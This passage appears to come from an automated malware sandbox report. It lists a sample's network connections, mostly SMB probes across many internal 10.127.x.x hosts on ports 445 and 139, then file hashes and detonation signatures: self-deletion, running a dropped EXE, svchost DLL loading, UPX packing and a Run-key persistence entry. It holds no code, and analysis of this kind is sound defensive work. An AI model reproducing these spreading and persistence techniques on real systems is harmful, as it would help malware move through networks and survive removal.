| N/A | 10.127.0.156:139 | tcp | |
| N/A | 10.127.1.53:139 | tcp | |
| GB | 142.250.179.234:445 | chromewebstore.googleapis.com | tcp |
| N/A | 10.127.1.54:445 | tcp | |
| N/A | 10.127.1.54:139 | tcp | |
| N/A | 10.127.1.55:445 | tcp | |
| N/A | 10.127.1.55:139 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.1.56:139 | tcp | |
| US | 104.208.16.95:445 | self.events.data.microsoft.com | tcp |
| N/A | 10.127.1.57:445 | tcp | |
| N/A | 10.127.1.57:139 | tcp | |
| N/A | 10.127.1.58:445 | tcp | |
| N/A | 10.127.1.58:139 | tcp | |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.1.59:139 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.162:139 | tcp | |
| N/A | 10.127.0.161:139 | tcp | |
| N/A | 10.127.0.160:139 | tcp | |
| N/A | 10.127.0.163:139 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.1.60:139 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.61:139 | tcp | |
| N/A | 10.127.1.62:445 | tcp | |
| N/A | 10.127.1.62:139 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| US | 13.107.42.16:445 | config.edge.skype.com | tcp |
| N/A | 10.127.1.63:139 | tcp | |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.64:139 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.65:139 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.166:139 | tcp | |
| N/A | 10.127.0.165:139 | tcp | |
| N/A | 10.127.0.164:139 | tcp | |
| N/A | 10.127.0.167:139 | tcp | |
| N/A | 10.127.1.66:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.1.67:139 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.68:139 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.1.69:139 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
| N/A | 10.127.1.70:139 | tcp | |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.1.71:139 | tcp | |
| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.1.72:139 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.0.169:139 | tcp | |
| N/A | 10.127.0.170:139 | tcp | |
| N/A | 10.127.0.168:139 | tcp | |
| N/A | 10.127.0.171:139 | tcp | |
| N/A | 10.127.1.73:139 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.74:139 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.75:139 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.1.76:139 | tcp | |
| N/A | 10.127.1.77:445 | tcp | |
| N/A | 10.127.1.77:139 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.78:139 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.1.79:139 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.172:139 | tcp | |
| N/A | 10.127.0.173:139 | tcp | |
| N/A | 10.127.0.174:139 | tcp | |
| N/A | 10.127.0.175:139 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.1.80:139 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.81:139 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.82:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.83:139 | tcp | |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.84:139 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.85:139 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.177:139 | tcp | |
| N/A | 10.127.0.178:139 | tcp | |
| N/A | 10.127.0.176:139 | tcp | |
| N/A | 10.127.0.179:139 | tcp | |
| N/A | 10.127.1.86:139 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.1.87:139 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.88:139 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.1.89:139 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| N/A | 10.127.1.90:139 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.1.91:139 | tcp | |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.1.92:139 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.0.181:139 | tcp | |
| N/A | 10.127.0.180:139 | tcp | |
| N/A | 10.127.0.182:139 | tcp | |
| N/A | 10.127.0.183:139 | tcp | |
| N/A | 10.127.1.93:139 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.94:139 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.95:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.96:139 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| N/A | 10.127.1.97:139 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.98:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.1.99:139 | tcp | |
| N/A | 10.127.0.186:139 | tcp | |
| N/A | 10.127.0.185:139 | tcp | |
| N/A | 10.127.0.184:139 | tcp | |
| N/A | 10.127.0.187:139 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.1.100:139 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.1.101:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.1.102:139 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.103:139 | tcp | |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.104:139 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| US | 8.8.8.8:53 | 186.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.1.105:139 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.0.188:139 | tcp | |
| N/A | 10.127.0.191:139 | tcp | |
| N/A | 10.127.0.189:139 | tcp | |
| N/A | 10.127.0.190:139 | tcp | |
| N/A | 10.127.1.106:139 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.1.107:139 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.108:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.109:139 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| N/A | 10.127.1.110:139 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.1.111:139 | tcp | |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.1.112:139 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.192:139 | tcp | |
| N/A | 10.127.0.195:139 | tcp | |
| N/A | 10.127.0.194:139 | tcp | |
| N/A | 10.127.0.193:139 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.1.113:139 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.1.114:139 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.1.115:139 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.116:139 | tcp | |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.117:139 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| US | 8.8.8.8:53 | 192.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.118:139 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.1.119:139 | tcp | |
| N/A | 10.127.0.196:139 | tcp | |
| N/A | 10.127.0.198:139 | tcp | |
| N/A | 10.127.0.199:139 | tcp | |
| N/A | 10.127.0.197:139 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.1.120:139 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.121:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.122:139 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.123:139 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.124:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.125:139 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.0.201:139 | tcp | |
| N/A | 10.127.0.200:139 | tcp | |
| N/A | 10.127.0.203:139 | tcp | |
| N/A | 10.127.0.202:139 | tcp | |
| N/A | 10.127.1.126:139 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.1.127:139 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.1.128:139 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.129:139 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| N/A | 10.127.1.130:139 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.1.131:139 | tcp | |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.1.132:139 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.204:139 | tcp | |
| N/A | 10.127.0.205:139 | tcp | |
| N/A | 10.127.0.206:139 | tcp | |
| N/A | 10.127.0.207:139 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.1.133:139 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.1.134:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.135:139 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.136:139 | tcp | |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.137:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.138:139 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.208:139 | tcp | |
| N/A | 10.127.0.209:139 | tcp | |
| N/A | 10.127.0.211:139 | tcp | |
| N/A | 10.127.0.210:139 | tcp | |
| N/A | 10.127.1.139:139 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.1.140:139 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.1.141:139 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.142:139 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| N/A | 10.127.1.143:139 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.1.144:139 | tcp | |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.145:139 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.212:139 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.0.213:139 | tcp | |
| N/A | 10.127.0.215:139 | tcp | |
| N/A | 10.127.0.214:139 | tcp | |
| N/A | 10.127.1.146:139 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.1.147:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.148:139 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.149:139 | tcp | |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.150:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.1.151:139 | tcp | |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.152:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.1.152:139 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.216:139 | tcp | |
| N/A | 10.127.0.217:139 | tcp | |
| N/A | 10.127.0.218:139 | tcp | |
| N/A | 10.127.0.219:139 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.1.153:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.154:139 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.155:139 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.1.156:139 | tcp | |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.1.157:139 | tcp | |
| US | 8.8.8.8:53 | 216.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.158:445 | tcp | |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.158:139 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.0.220:139 | tcp | |
| N/A | 10.127.0.221:139 | tcp | |
| N/A | 10.127.0.222:139 | tcp | |
| N/A | 10.127.0.223:139 | tcp | |
| N/A | 10.127.1.159:139 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.1.160:139 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.161:139 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| N/A | 10.127.1.162:139 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| N/A | 10.127.1.163:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.1.164:139 | tcp | |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.165:139 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.0.224:139 | tcp | |
| N/A | 10.127.0.225:139 | tcp | |
| N/A | 10.127.0.227:139 | tcp | |
| N/A | 10.127.0.226:139 | tcp | |
| N/A | 10.127.1.166:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.167:139 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.168:139 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.1.169:139 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.1.170:139 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.171:139 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.1.172:139 | tcp | |
| N/A | 10.127.0.228:139 | tcp | |
| N/A | 10.127.0.229:139 | tcp | |
| N/A | 10.127.0.230:139 | tcp | |
| N/A | 10.127.0.231:139 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.1.173:139 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.174:139 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.175:139 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.176:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.177:139 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.178:139 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.232:139 | tcp | |
| N/A | 10.127.0.233:139 | tcp | |
| N/A | 10.127.0.234:139 | tcp | |
| N/A | 10.127.0.235:139 | tcp | |
| N/A | 10.127.1.179:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| N/A | 10.127.1.180:139 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.181:139 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.1.182:139 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.1.183:139 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.1.184:139 | tcp | |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.185:445 | tcp | |
| N/A | 10.127.1.185:139 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.0.236:139 | tcp | |
| N/A | 10.127.0.237:139 | tcp | |
| N/A | 10.127.0.239:139 | tcp | |
| N/A | 10.127.0.238:139 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.1.186:139 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.187:139 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.188:139 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.189:139 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.1.190:445 | tcp |
Files
memory/4844-0-0x0000000002FA0000-0x0000000002FFE000-memory.dmp
memory/4844-8-0x0000000002FA0000-0x0000000002FFE000-memory.dmp
memory/4844-9-0x0000000002FA0000-0x0000000002FFE000-memory.dmp
memory/4844-10-0x0000000002FA0000-0x0000000002FFE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\E659.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/4844-22-0x0000000002FA0000-0x0000000002FFE000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240611-en
Max time kernel
1750s
Max time network
1754s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rdeqmvxaro.pre | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
